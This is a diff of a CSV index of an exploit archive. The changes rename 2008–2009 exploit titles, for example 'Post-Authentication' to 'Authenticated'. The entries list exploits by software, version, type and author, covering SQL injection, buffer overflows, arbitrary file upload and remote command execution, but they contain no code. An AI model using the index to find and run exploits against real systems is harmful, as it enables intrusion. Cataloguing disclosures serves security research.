 5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
-5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
+5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0
 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0
 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
@@ -5439,7 +5438,7 @@ id,file,description,date,author,platform,type,port
 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0
 5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0
 5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0
-5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0
+5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0
 5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0
 5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0
 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0
@@ -5589,7 +5588,7 @@ id,file,description,date,author,platform,type,port
 5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition - SQL Injection",2008-06-28,His0k4,php,webapps,0
 5966,platforms/php/webapps/5966.pl,"Joomla Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,php,webapps,0
 5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,php,webapps,0
-5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0
+5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0
 5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) SQL Injection",2008-06-30,anonymous,php,webapps,0
 5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0
 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",php,webapps,0
@@ -5710,14 +5709,14 @@ id,file,description,date,author,platform,type,port
 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0
 6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
 6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0
-6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
+6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0
 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0
 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0
 6099,platforms/php/webapps/6099.txt,"Siteframe - 'folder.php id' SQL Injection",2008-07-18,n0ne,php,webapps,0
 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows/x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
-6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0
+6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0
 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0
 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0
 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0
@@ -5998,7 +5997,7 @@ id,file,description,date,author,platform,type,port
 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
 6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0
-6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
+6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
@@ -6090,7 +6089,7 @@ id,file,description,date,author,platform,type,port
 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0
 6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
-6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Post-Authentication) File Upload",2008-09-21,InjEctOr5,php,webapps,0
+6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0
 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0
 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0
@@ -6233,8 +6232,8 @@ id,file,description,date,author,platform,type,port
 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
-6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
-6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
+6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
+6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Authenticated) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
@@ -6270,7 +6269,7 @@ id,file,description,date,author,platform,type,port
 6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
 6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0
 6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0
-6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0
+6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0
 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0
 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0
 6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - (campaignId) SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0
@@ -6290,7 +6289,7 @@ id,file,description,date,author,platform,type,port
 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0
-6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service",2008-10-10,rAWjAW,windows,dos,0
+6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0
 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0
 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
 6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
@@ -6369,18 +6368,18 @@ id,file,description,date,author,platform,type,port
 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0
 6798,platforms/windows/local/6798.pl,"VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
 6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0
-6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
+6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
 6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0
 6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0
 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0
 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22
 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
 6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
-6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
+6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0
 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0
 6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0
-6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
+6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0
 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0
 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
@@ -6649,7 +6648,7 @@ id,file,description,date,author,platform,type,port
 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0
-7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass Exploit",2008-11-10,G4N0K,php,webapps,0
+7087,platforms/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0
 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0
 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
@@ -6928,7 +6927,7 @@ id,file,description,date,author,platform,type,port
 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0
 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0
 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - (Cross-Site Request Forgery) SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0
-7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site File Upload",2008-12-08,"Michael Brooks",php,webapps,0
+7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",php,webapps,0
 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - (Cross-Site Request Forgery) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0
 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0
 7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0
@@ -7052,7 +7051,7 @@ id,file,description,date,author,platform,type,port
 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0
 7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0
 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0
-7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0
+7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary .PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0
 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0
 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0
 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0
@@ -7178,7 +7177,7 @@ id,file,description,date,author,platform,type,port
 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0
 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0
 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0
-7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote PHP File Upload",2009-01-01,Lo$er,php,webapps,0
+7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0
 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0
 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - (news.php newsid) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
@@ -7412,7 +7411,7 @@ id,file,description,date,author,platform,type,port
 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0
 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0
-7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21
+7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21
 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - ''Username'' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0
 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
@@ -7444,7 +7443,7 @@ id,file,description,date,author,platform,type,port
 7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0
 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0
 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0
-7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0
+7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0
 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0
 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
 7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,windows,remote,0
@@ -7516,7 +7515,7 @@ id,file,description,date,author,platform,type,port
 7982,platforms/asp/webapps/7982.txt,"team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0
 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
 7985,platforms/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT command Off-by-One Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0
-7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0
+7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0
 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0
 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows XP)",2009-02-04,"Rob Carter",windows,remote,0
 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows Vista)",2009-02-04,"Rob Carter",windows,remote,0
@@ -7528,7 +7527,7 @@ id,file,description,date,author,platform,type,port
 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",windows,dos,0
 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0
 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
-7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
+7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0
@@ -7578,7 +7577,7 @@ id,file,description,date,author,platform,type,port
 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0
 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0
 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0
-8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
+8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0
 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0
 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0
@@ -7619,7 +7618,7 @@ id,file,description,date,author,platform,type,port
 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection",2009-02-20,Osirys,php,webapps,0
 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0
 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
-8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Pre-Authentication",2009-02-23,ahmadbady,php,webapps,0
+8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated",2009-02-23,ahmadbady,php,webapps,0
 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution",2009-02-23,JosS,php,webapps,0
 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
@@ -7706,7 +7705,7 @@ id,file,description,date,author,platform,type,port
 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection",2009-03-09,netsoul,php,webapps,0
 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0
-8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Post-Authentication Denial of Service",2009-03-09,h00die,hardware,dos,0
+8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0
 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0
 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local,0
 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0
@@ -7729,7 +7728,7 @@ id,file,description,date,author,platform,type,port
 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0
